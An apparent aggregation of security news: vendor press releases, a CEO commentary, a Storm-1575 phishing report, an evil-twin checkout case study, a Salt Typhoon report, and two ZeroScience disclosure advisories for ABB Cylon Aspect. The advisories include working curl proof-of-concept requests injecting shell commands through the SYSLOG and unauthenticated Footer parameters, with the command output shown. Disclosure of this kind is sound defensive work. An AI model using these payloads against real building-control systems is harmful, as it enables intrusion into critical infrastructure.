San Francisco, CA, 8th October 2024, CyberNewsWire

**San Francisco, CA, October 8th, 2024, CyberNewsWire**

Partnership aims to help businesses eliminate vulnerable attack surfaces and provide a more streamlined user experience.

**Badge Inc****.**, the award-winning privacy company enabling Identity without Secrets™, today announced a partnership with CyberArk and the public release of its integration in the CyberArk Marketplace.

According to the CyberArk website: The Badge CyberArk Identity integration allows specified users to authenticate into CyberArk Identity and its downstream apps and services, using Badge. This enables user-centric privacy, allowing users to issue and revoke digital identity and keys on-demand using biometrics and/or other factors.

The blog post mentions that privileged users hold highly sensitive access credentials and face an ever-increasing threat surface. This has made these users and their credentials prime targets for cyber-attacks. By leveraging Badge’s technology to eliminate the storage of user credentials, organizations benefit unprecedented security, while maintaining a great user experience.

> Archit Lohokare, CyberArk’s GM for Workforce Solutions, “CyberArk is excited to partner with Badge and offer this new integration. It is an important step forward in our mission to deliver comprehensive identity security solutions across all identities and all environments. Badge’s expertise in eliminating stored secrets and removing friction in difficult use cases complements our identity security platform.”

**Integration to CyberArk Marketplace**

Badge and CyberArk are launching a new integration that: 

1.  Enables unprecedented multi-factor authentication experience across all channels, including new and shared devices,
2.  Offers next-generation privacy technology and a more streamlined user experience to customers
3.  Brings phishing-resistant authentication to account recovery workflows.

> “We’re proud to partner with CyberArk. This integration represents a pivotal step forward in the quest to defeat cyber threats targeting privileged accounts. Stored privileged credentials are a high-target vulnerability, and eliminating this weak point is a big step forward. It also underscores the importance of innovative cybersecurity solutions and demonstrates how advancements in technology can be leveraged to enhance security measures across the board,” said Dr. Tina P. Srivastava, Badge Co-founder. “By addressing the vulnerabilities associated with traditional authentication methods like passwords, organizations can protect their most critical assets more effectively, ensuring that their ‘keys to the kingdom’ remain out of reach from cyber adversaries.”

As cyber threats evolve, so are the approaches to cybersecurity. Together, Badge and CyberArk are helping businesses eliminate vulnerable attack surfaces and provide a more streamlined user experience.

**About CyberArk** 

CyberArk is the global leader in identity security. Centered on intelligent privilege controls, CyberArk provides the most comprehensive security offering for any identity – human or machine – across business applications, distributed workforces, hybrid cloud environments and throughout the DevOps lifecycle. The world’s leading organizations trust CyberArk to help secure their most critical assets.

**About Badge**

Badge enables privacy-preserving authentication to every application, on any device, without storing user secrets or PII. Badge’s patented technology allows users to derive private keys on the fly using their biometrics and factors of choice without the need for hardware tokens or secrets. Badge was founded by field-tested cryptography PhDs from MIT and is venture-backed by tier 1 investors. Customers and partners include top Fortune companies across healthcare, banking, retail, and services. To learn more: **www.badgeinc.com****.**

**Contact**

**Media Contact**  
**John O’Brien**  
**SBS Comms**  
**\[email protected\]**

Badge and CyberArk Announce Partnership to Redefine Privacy in PAM and Secrets Management

Company leadership needs to ensure technology teams are managing continuous monitoring, automated testing, and alignment with business needs across their enterprise.

Source: Stu Gray via Alamy Stock Photo

COMMENTARY

This summer, a cyberattack disrupted the normal operations of thousands of auto dealerships across the United States, affecting everything from records to scheduling, causing no end to annoyances and leaving hordes of exasperated salespeople and customers at their wits' end.

The most recent and dramatic example of hacker success illustrates that IT security must become the first priority at the highest levels of an organization. This modern-day plague shows no sign of subsiding. With each successful attack, hackers become even more emboldened. 

It's an all-out assault, requiring the corporate equivalent of an all-points bulletin. In short, cybersecurity is not just an IT issue; it's a critical business risk that requires active involvement from the entire C-suite, in particular, the CEO. This is one area of the enterprise that may benefit from micromanagement in an effort to display the importance of the pursuit.

My colleagues and I regularly advise our clients that they should be asking three questions of their team: What are we doing? Is it enough? How do we know?

Effective cybersecurity requires the right balance of spending and technology value, continuous assessment, and the adoption of advanced technologies such as automation and artificial intelligence. Few regret wise investments in cybersecurity defenses.

The increasing frequency and sophistication of cyberattacks underscore the seriousness for executive-level engagement in cybersecurity. Recent incidents, such as the SEC's $10 million fine on the New York Stock Exchange's parent company and the notorious SolarWinds action, illustrate the severe impact on business operations and regulatory compliance. These events highlight the necessity for CEOs to recognize their critical role in cybersecurity. 

Ascension Healthcare's ransomware attack, among other prime examples, serves as an object lesson in the urgency of the matter, especially in healthcare. Doctors and pharmacies struggled with order and prescription issues, leading to lost revenue as patients sought services elsewhere, and virtually bringing the massive hospital system to its figurative knees, causing tremendous frustration among staff and patients. This situation underscored the need for technologists to understand business operations and implement security measures that support the business. 

CEOs must understand that cybersecurity is central to their management duties and not just "tech stuff" to be delegated. They need to receive business-outcome-focused reporting with the same level of rigor as financial and safety reporting. This reporting should answer the above three questions using system-generated metrics and integrate results into business decisions to stay ahead of the increasingly destructive capabilities of adversaries conspiring to do them harm.

CEOs set the organizational tone and ultimately are responsible for cybersecurity. Their endorsement of security measures can drive home their importance, ensure alignment with business goals across the senior leadership team, and communicate capabilities to their boards. The following steps are essential for CEOs to prioritize cybersecurity:

*   Engage in cybersecurity planning and response: CEOs and executive leaders must be actively involved in cybersecurity planning and response. Their endorsement and understanding of cybersecurity's importance can fuel organizational commitment and set the right tone. Deciding how to handle hypothetical ransom, extortion, and fraud events accelerates response when an event occurs.
    

*   Conduct business analysis for cyber spending: Utilize business analysis to determine the appropriate cybersecurity investments. Focus on preventive technologies that provide greater risk reduction and ensure that the spending aligns with business priorities.
    

*   Implement multifactor authentication: Ensure that multifactor authentication is in place and effective. Avoid inferior solutions that users can mindlessly click through, and prioritize strong authentication measures for password resets to enhance security.
    

*   Regularly review and assess cybersecurity measures: Frequently review assessment results and address important gaps. This includes adopting automation for continuous threat exposure management and ensuring cybersecurity is integrated into business operations.
    

*   Adopt advanced technologies and continuous testing: Embrace automation and advanced technologies for security testing and closing security gaps. Stay ahead of emerging threats by keeping up with advancements in AI and other technologies.
    

*   Seek independent advice and expertise: Business leaders will be called to answer for hiring well-qualified cybersecurity advisers and executives. Use the three questions to understand the current state of cybersecurity within the organization. Seek independent advice to keep up with current threats and defenses. Obtain board members' cybersecurity expertise combined with other essential business skills, or hire independent advisers to provide valuable insights.
    

What hasn't played out yet is the full impact of increased AI usage by both attackers and defenders. As AI technology advances, organizations must keep up to ensure their cybersecurity measures are effective. A recent survey of IT security officers revealed that increasing use of AI will lead to more security breaches, while, conversely, four in five intend to use AI to guard against those same breaches. The ongoing complexity and expanding surface area of systems likely will lead to an increase in cyberattacks through 2030. This necessitates continuous vigilance, adoption of automation for threat and vulnerability management, and regular reviews of cybersecurity measures. Companies will also have to understand and protect against new AI-enabled systems that they are developing. 

Cyber-risk is inherently a business risk, and effective cybersecurity measures are essential for protecting valuable information and maintaining system availability.

One might argue that cybersecurity can be managed solely by IT departments. However, without executive-level involvement, organizations may face significant business disruptions and regulatory penalties. CEOs must understand their role in cybersecurity to ensure comprehensive protection.

The consistent pattern of cyber incidents causing business disruptions and regulatory fines supports the conclusion that CEO involvement is crucial to ensure that companies can answer the three questions: What are we doing? Is it enough? How do we know? Determining business value at risk and the right amount of protection requires business input. As company leadership, now is the time to ensure that technology teams are managing continuous monitoring, automated testing, and alignment with business needs across the enterprise.

**About the Author**

Managing Director, BPM

Ken Frantz is a transformational IT leader and consultant with experience in global financial services, emerging technology, and top-tier health system networks. He focuses on innovative technology advancement with reduced risk and is interested in high impact/high value opportunities to improve IT operations, deliver value, and help companies grow efficiently and effectively.

Your IT Systems Are Being Attacked. Are You Prepared?

The Storm-1575 group is known for frequently rebranding its phishing infrastructure. Recently, ANY.RUN analysts identified the deployment of…

The Storm-1575 group is known for frequently rebranding its phishing infrastructure. Recently, ANY.RUN analysts identified the deployment of new login panels, which are part of the threat actor’s ongoing efforts to compromise users’ Microsoft and Google accounts.

****Storm-1575’s New Login Panels****

Through analysis of their features, the team was able to link login panels to Storm-1575. Among other things, the panels share:

*   Phishing domains 
*   Random panel page headers
*   Use of website templates to mask servers 
*   Panel token verification request, the same font, and the panel URL 

_Comparison of Storm-1575’s phishkits_

The panels also have their distinctive features:

*   **Target Accounts**: Microsoft vs. Google 
*   **Verification**: Cloudflare for Microsoft, arithmetic CAPTCHA for Google 
*   **Encryption**: Strong AES CryptoJS for Microsoft, weak obfuscation for Google

The findings confirm that these panels are operated by Storm-1575, a group that previously used the same infrastructure with other phishing platforms such as DadSec, Phoenix Panel, and Rockstar2FA Portal.

****How to Proactively Discover New Storm-1575 Attacks****

To stay ahead of Storm-1575’s latest phishing tactics, cybersecurity professionals can use ANY.RUN’s Threat Intelligence Lookup. 

This powerful platform offers a centralized repository of threat data from ANY.RUN’s malware sandbox sessions, enable users to investigate emerging threats with access to indicators of compromise, network activity, and file behaviours. 

One example of Storm-1575’s phishing infrastructure is the domain menlologistics.com. By submitting this domain to the TI Lookup platform, users can uncover key details about its malicious activity.

_Search by the domain name in ANY.RUN TI Lookup_

A search query for **domainName:”menlologistics.”** revealed 4 associated IP addresses and 69 sandbox sessions in ANY.RUN, most of which were linked to phishing activities.

Analysts can also investigate by threat name using **threatName:”storm1575″**, granting direct access to any recorded session where this threat was detected in the ANY.RUN sandbox.

_Search by the threat name in ANY.RUN TI Lookup_

This integration between TI Lookup and the sandbox provides a comprehensive view of the threat landscape, enabling users to review real-time phishing tactics and infrastructure in action.

****ANY.RUN Threat Intelligence Portal****

If you’re looking to enhance your threat intelligence capabilities, explore ANY.RUN’s TI portal to gain deeper insights into the world of cyber threats and strengthen your defences.

Test ANY.RUN’s Threat Intelligence Lookup to see how it can improve your threat-hunting efforts.

1.  Analysis of Top Infostealers: Redline, Vidar and Formbook
2.  PythonAnywhere Cloud Platform Abused for Hosting Ransomware
3.  Tycoon and Storm-1575 Linked to Phishing Attacks on US Schools
4.  ANY.RUN Upgrades Threat Intelligence to Identify Emerging Threats
5.  StormBamboo APT Targets ISPs, Spreads Malware via Software Updates

Storm-1575 Threat Actor Deploys New Login Panels for Phishing Infrastructure

Is your store at risk? Discover how an innovative web security solution saved one global online retailer and its unsuspecting customers from an “evil twin” disaster. Read the full real-life case study here.

The Invisible Threat in Online Shopping
When is a checkout page, not a checkout page? When it's an “evil twin”! Malicious redirects can send unsuspecting shoppers to these perfect-looking

Web Security / Payment Fraud

**Is your store at risk? Discover how an innovative web security solution saved one global online retailer and its unsuspecting customers from an "evil twin" disaster. Read the full real-life case study here.******The Invisible Threat in Online Shopping****

When is a checkout page, not a checkout page? When it's an "evil twin"! Malicious redirects can send unsuspecting shoppers to these perfect-looking fake checkout pages and steal their payment information, so could your store be at risk too? Discover how an innovative web security solution saved one global online retailer and its unsuspecting customers from an "evil twin" disaster. (You can read the full case study here)

****Anatomy of an Evil Twin Attack****

In today's fast-paced world of online shopping, convenience often trumps caution. Shoppers quickly move through product selection to checkout, rarely scrutinizing the process. This lack of attention creates an opportunity for cybercriminals to exploit.

****The Deceptive Redirect****

The attack begins on a legitimate shopping site but uses a malicious redirect to guide shoppers to a fraudulent checkout page. This "evil twin" page is meticulously designed to mimic the authentic site, making it nearly impossible for the average user to detect the deception.

****The Devil in the Details****

The only telltale sign might be a subtle change in the URL. For example:

*   Legitimate: Fabulousclothingstore.com
*   Fraudulent: Fabulousclothingstre.com/checkout

Did you spot the missing 'o'? This technique, known as typosquatting, involves registering domain names that closely resemble legitimate websites.

****The Data Heist****

Once on the fake checkout page, unsuspecting shoppers enter their sensitive financial information, which is then forwarded to the attackers. This stolen data can be used for fraudulent transactions or sold on the dark web, potentially leading to significant financial losses for the victims.

****The Infection Vector: How Websites Get Compromised****

While the specific infection method in this case study remains unclear (a common scenario in cybersecurity incidents), we can infer that the attackers likely employed a common technique such as a cross-site scripting (XSS) attack. These attacks exploit vulnerabilities in website code or third-party plugins to inject malicious scripts.

****Evading Detection: The Art of Obfuscation****

Malicious actors use code obfuscation to bypass traditional security measures. Obfuscation in programming is analogous to using unnecessarily complex language to convey a simple message. It's not encryption, which renders text unreadable, but rather a method of camouflaging the true intent of the code.

****Example of Obfuscated Code****

Developers routinely use obfuscation to protect their intellectual property, but hackers use it too, to hide their code from malware detectors. This is just part of what the Reflectiz security solution found on the victim's website:

\*note: _for obvious reasons, the client wants to stay anonymous. That's why we changed the real url name with a fictional one._

This obfuscated snippet conceals the true purpose of the code, which includes the malicious redirect and an event listener designed to activate upon specific user actions. You can read more about the details of this in the full case study.

****Unmasking the Threat: Deobfuscation and Behavioral Analysis****

Traditional signature-based malware detection often fails to identify obfuscated threats. The Reflectiz security solution employs deep behavioral analysis, monitoring millions of website events to detect suspicious changes.

Upon identifying the obfuscated code, Reflectiz's advanced deobfuscation tool reverse-engineered the malicious script, revealing its true intent. The security team promptly alerted the retailer, providing detailed evidence and a comprehensive threat analysis.

****Swift Action and Consequences Averted****

The retailer's quick response in removing the malicious code potentially saved them from:

1.  Substantial regulatory fines (GDPR, CCPA, CPRA, PCI-DSS)
2.  Class action lawsuits from affected customers
3.  Revenue loss due to reputational damage

****The Imperative of Continuous Protection****

This case study underscores the critical need for robust, continuous web security monitoring. As cyber threats evolve, so too must our defenses. By implementing advanced security solutions like Reflectiz, businesses can protect both their assets and their customers from sophisticated attacks.

For a deeper dive into how Reflectiz protected the retailer from this common yet dangerous threat, we encourage you to read the full case study here.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Case Study: The Evil Twin Checkout Page 

Introduction 
Artificial intelligence (AI) deepfakes and misinformation may cause worry in the world of technology and investment, but this powerful, foundational technology has the potential to benefit organizations of all kinds when harnessed appropriately. 
In the world of cybersecurity, one of the most important areas of application of AI is augmenting and enhancing identity management

Machine Learning / Data Security

**Introduction**

Artificial intelligence (AI) deepfakes and misinformation may cause worry in the world of technology and investment, but this powerful, foundational technology has the potential to benefit organizations of all kinds when harnessed appropriately.

In the world of cybersecurity, one of the most important areas of application of AI is augmenting and enhancing identity management systems. AI-powered identity lifecycle management is at the vanguard of digital identity and is used to enhance security, streamline governance and improve the UX of an identity system.

**Benefits of an AI-powered identity**

AI is a technology that crosses barriers between traditionally opposing business area drivers, bringing previously conflicting areas together:

*   AI enables better operational efficiency by reducing risk and improving security
*   AI enables businesses to achieve goals by securing cyber-resilience
*   AI facilitates agile and secure access by ensuring regulatory compliance

**AI and unified identity**

AI-powered identity delivers the intelligence needed to repel attacks and correct access anomalies impacting our identity infrastructure. However, a key enabler of AI within an identity lifecycle management system is the unification of identity. AI can find applications across a unified identity surface, working symbiotically to meet the requisites of the business drivers.

**AI-powered identity in practice**

When applied appropriately, AI technologies have the power to mitigate access errors and tackle the current onslaught of identity-centered cyberattacks. AI-powered identity can leverage machine learning models to identify signals of an attack, such as behavioral anomalies, that point to a data exfiltration event.

One Identity has capitalized on the power of AI models to enhance and enable various aspects of identity security:

**Risk detection for identity governance and administration (IGA)**

AI-powered identity governance and administration (IGA) offers a method to identify unusual behavior and spot the signals of data exposure and data exfiltration events. One Identity Safeguard uses an AI model known as "Random Forests," a machine learning algorithm combining the output from multiple decision trees to deliver insights. Safeguard analyzes data from such events as mouse movement, keystroke dynamics, login time and command analytics to identify behavioral anomalies and automate attack. Human operators then interact with a dashboard to interpret and make decisions based on the AI-generated output to allow an organization to effectively lower the cybersecurity skills barrier.

**Access management**

Data from access management authentication events can be leveraged to identify a signal of cyberattack and credential compromise. The access event data (e.g., identity, location, device, etc.) is gathered when someone logs in. An authorization decision is made, and security requirements may then use step-up authentication rather than deny access.

However, AI advances this simple model. One Identity OneLogin uses Vigilance AI™ Threat Engine15 to analyze large volumes of data to identify threats. By utilizing User and Entity Behavior Analytics (UEBA), a profile of typical user behavior is created as a baseline. This is then used to identify anomalies and prevent risk.

OneLogin can feed the data from access requests, as well as its derived analytical insights, in the form of rich syslogs into SIEM and SOC systems.

**Entitlement management**

Role-based access is a fundamental principle of identity security. But managing those roles manually can pose a challenge. Machine learning has been used in identity "role mining" or "role discovery" for some time, but a novel application from One Identity delivers the role mining insights directly to the relevant person for streamlined entitlement management.

For example, you can use AI to optimize team role policies on an ongoing basis, making entitlement management an ongoing, automated task that provides accurate insights into access requirements across the organization.

**Conclusion**

Identity management systems must respond to the increasing volume of sophisticated identity-based threats. The response comes in the form of system augmentation through AI, with authoritative, high-quality identity data feeding the AI models used to enhance identity lifecycle management. This capability enhancement is essential in developing and delivering entitle management and IGA for a robust security posture and cyber resilience. With the unification of identity-related services making identity management simpler and more effective, adding AI to a unified identity platform endows an organization with the resilience to resist even the most complex identity-related threats.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

The Value of AI-Powered Identity

The Chinese state-sponsored cyberattack threat managed to infiltrate the "lawful intercept" network connections that police use in criminal investigations.

Source: Miro Novak via Alamy Stock Photo

The Chinese state-sponsored advanced persistent threat (APT) known as Salt Typhoon appears to have accessed major US broadband provider networks by hacking into the systems that law-enforcement agencies use for court-authorized wiretapping.

According to unnamed sources speaking to the Wall Street Journal, the affected providers include major national players like AT&T and Verizon Communications, along with enterprise-specific service providers like Lumen Technologies.

In addition to the wiretapping connections, the sources said Salt Typhoon also had access to more general Internet traffic flowing through the provider networks, and that the cyberattackers went after a handful of targets outside the US as well. The APT could have had access for months, they added.

"The widespread compromise is considered a potentially catastrophic security breach and was carried out by a sophisticated Chinese hacking group dubbed Salt Typhoon," sources told the WSJ. "It appeared to be geared toward intelligence collection."

Neither AT&T, Lumen, or Verizon immediately responded to a request for comment from Dark Reading.

**Lawful Intercept Connections in China's Hacking Sights**

The news comes about a week after Salt Typhoon was outed as hacking into major telecom networks for cyber-espionage purposes, and possibly to position itself to disrupt communications in the event of a kinetic conflict between China and the US. But the subversion of the connections that law enforcement entities have to service provider networks (which they can use to intercept communications of private individuals or organizations during criminal investigations or for purposes of national security) is a new wrinkle.

No information is available on how the attackers might have gotten access to the lawful intercept infrastructure, but Ram Elboim, CEO of Sygnia, which tracks the APT as "GhostEmperor," notes that clearly Salt Typhoon performed extensive reconnaissance.

"Reaching and compromising these sensitive assets requires not only familiarity with the network structure, but also advanced capabilities to be able to move laterally across separated sub-networks," he tells Dark Reading. "One assumes that these assets are far separated from the ISP corporate and operational network, and also connected to law enforcements’ networks in order for authorities to be able to operate and stream the gathered data in a very secure method."

This breach demonstrates the need for critical infrastructure organizations to not only design their network structure securely with strict segregation strategies, but to "continuously update and test the resilience of their operational networks and sensitive assets as part of a robust incident response playbook," he adds.

**About the Author**

Tara Seals has 20+ years of experience as a journalist, analyst and editor in the cybersecurity, communications and technology space. Prior to Dark Reading, Tara was Editor in Chief at Threatpost, and prior to that, the North American news lead for Infosecurity Magazine. She also spent 13 years working for Informa (formerly Virgo Publishing), as executive editor and editor-in-chief at publications focused on both the service provider and the enterprise arenas. A Texas native, she holds a B.A. from Columbia University, lives in Western Massachusetts with her family and is on a never-ending quest for good Mexican food in the Northeast.

Salt Typhoon APT Subverts Law Enforcement Wiretapping: Report

ABB Cylon Aspect versions 3.08.00 and below suffer from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the SYSLOG HTTP POST parameter called by the syslogSwitch.php script.

    ABB Cylon Aspect 3.08.00 (syslogSwitch.php) Remote Code ExecutionVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio                  Firmware: <=3.08.00Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: The ABB BMS/BAS controller suffers from an authenticated OS commandinjection vulnerability. This can be exploited to inject and execute arbitraryshell commands through the 'SYSLOG' HTTP POST parameter called by the syslogSwitch.phpscript.Tested on: GNU/Linux 3.15.10 (armv7l)           GNU/Linux 3.10.0 (x86_64)           GNU/Linux 2.6.32 (x86_64)           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz           PHP/7.3.11           PHP/5.6.30           PHP/5.4.16           PHP/4.4.8           PHP/5.3.3           AspectFT Automation Application Server           lighttpd/1.4.32           lighttpd/1.4.18           Apache/2.2.15 (CentOS)           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5835Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5835.php21.04.2024--$ cat project                 P   R   O   J   E   C   T                        .|                        | |                        |'|            ._____                ___    |  |            |.   |' .---"|        _    .-'   '-. |  |     .--'|  ||   | _|    |     .-'|  _.|  |    ||   '-__  |   |  |    ||      |     |' | |.    |    ||       | |   |  |    ||      | ____|  '-'     '    ""       '-'   '-.'    '`      |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                                     ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░          ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░          ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                                                                                                                                              $ curl -sX POST http://192.168.73.31/syslogSwitch.php \> -H "Cookie: PHPSESSID=xxx" \> -d "SYSLOG=`id`&Submit=Save" \> | grep "Logger enabled"Logger enabled: uid=48(apache) gid=48(apache) groups=48(apache),0(root) <br>Logger configuration complete <br>

ABB Cylon Aspect 3.08.00 syslogSwitch.php Remote Code Execution

ABB Cylon Aspect versions 3.08.01 and below suffer from an unauthenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the Footer HTTP POST parameter called by the caldavUtil.php script.

  
ABB Cylon Aspect 3.08.01 (caldavUtil.php) Remote Code Execution

Vendor: ABB Ltd.  
Product web page: https://www.global.abb  
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio  
                  Firmware: <=3.08.01

Summary: ASPECT is an award-winning scalable building energy management  
and control solution designed to allow users seamless access to their  
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from an unauthenticated OS command  
injection vulnerability. This can be exploited to inject and execute arbitrary  
shell commands through the 'Footer' HTTP POST parameter called by the caldavUtil.php  
script.

Tested on: GNU/Linux 3.15.10 (armv7l)  
           GNU/Linux 3.10.0 (x86_64)  
           GNU/Linux 2.6.32 (x86_64)  
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz  
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz  
           PHP/7.3.11  
           PHP/5.6.30  
           PHP/5.4.16  
           PHP/4.4.8  
           PHP/5.3.3  
           AspectFT Automation Application Server  
           lighttpd/1.4.32  
           lighttpd/1.4.18  
           Apache/2.2.15 (CentOS)  
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)  
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2024-5834  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5834.php

21.04.2024

--

$ cat project

                 P   R   O   J   E   C   T

                        .|  
                        | |  
                        |'|            ._____  
                ___    |  |            |.   |' .---"|  
        _    .-'   '-. |  |     .--'|  ||   | _|    |  
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |  
     |' | |.    |    ||       | |   |  |    ||      |  
 ____|  '-'     '    ""       '-'   '-.'    '`      |____  
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░    
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                              
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░   
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░   
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               

                                                                                                               $ curl -X POST "http://192.168.73.31/caldavUtil.php" -d "command=postFooter&Footer=%60id%60"  
Set footer to uid=33(www-data) gid=33(www-data) groups=33(www-data):

ABB Cylon Aspect 3.08.01 caldavUtil.php Remote Code Execution

Torrance, United States / California, 7th October 2024, CyberNewsWire

**Torrance, United States / California, October 7th, 2024, CyberNewsWire**

Criminal IP, a renowned Cyber Threat Intelligence (CTI) search engine developed by AI SPERA, has partnered with Hybrid Analysis, a platform that provides advanced malware analysis and threat intelligence, to enhance threat research.

This collaboration integrates Criminal IP’s advanced domain scanning capabilities into the Hybrid Analysis platform, providing security professionals with deeper insights and more effective threat mitigation strategies.

**Comprehensive Malware and Domain Analysis**

Hybrid Analysis employs dynamic and static techniques for thorough malware analysis. Real-time execution environments and memory dumps generate annotated disassembly listings and critical Indicators of Compromise (IOCs).

Criminal IP specializes in real-time domain scanning, scrutinizing domains for phishing, malware, and illicit activities. Integration enriches threat profiles, improving threat detection accuracy.

**Key Benefits of the Collaboration:**

*   **Enhanced Threat Profiling**: Security professionals can gain deeper insights into the origins and behaviors of threats identified through Hybrid Analysis, enriched with Criminal IP’s data.
*   **Real-Time Domain Analysis**: Integration with Criminal IP enables users to conduct real-time scans on domains of interest, which is crucial for accurately identifying emerging threats promptly.
*   **Comprehensive Security Insights**: Users gain access to detailed domain attributes such as phishing records, abuse incidents, and detection of embedded malicious code, enhancing their ability to analyze for signs of Domain Generation Algorithms (DGA) and phishing probabilities.
*   **Interactive Score Card**: Users can quickly assess domain status, accessing additional details directly from Criminal IP database to make informed decisions based on the latest threat intelligence.

**Criminal IP’s Advanced Real-Time Threat Detection**

In addition to this comprehensive maliciousness result, uses seeking information about each component and false positives can visit Criminal IP.

<Example of Criminal IP Domain Search for malicious URL>

The URL scan feature allows users to extract a wealth of data, including network logs, associated IP addresses, malicious links, and website vulnerabilities.

Users of Criminal IP Domain Search can access valuable insights such as technology usage specifics, abuse records, and identified CVE vulnerabilities, all conveniently consolidated on a single page.

This robust search engine offers three customizable subscription plans—Lite, Medium, and Pro—including a Free membership option.

To determine the most suitable plan based on user’s volume of IP Lookup and URL Scan/Lookup requirements, users can explore the Free membership, monitor their credit usage through a user-friendly dashboard, and take advantage of key features for gaining valuable insights.

**About AI SPERA**

AI SPERA, a leader in Cyber Threat Intelligence (CTI) solutions, significantly expanded its reach by launching its flagship solution, Criminal IP, in 2023.

Since then, the company has formed technical and business collaborations with over 40 renowned global security firms, including Hybrid Analysis, VirusTotal, Cisco, Tenable, Sumo Logic, and Quad9.

Besides the CTI search engine, the company offers Criminal IP ASM, a SaaS-based Attack Surface Management Solution on AWS Marketplace and Azure Marketplace, and Criminal IP FDS, an AI-based Anomaly Detection Solution for credential stuffing prevention and fraud detection.

Available in five languages (English, French, Arabic, Korean, and Japanese), the search engine provides a powerful service for users worldwide.

**Contact**

**Michael Sena**  
**AI SPERA**  
**\[email protected\]**

Hybrid Analysis Utilizes Criminal IP’s Robust Domain Data for Better Malware Detection

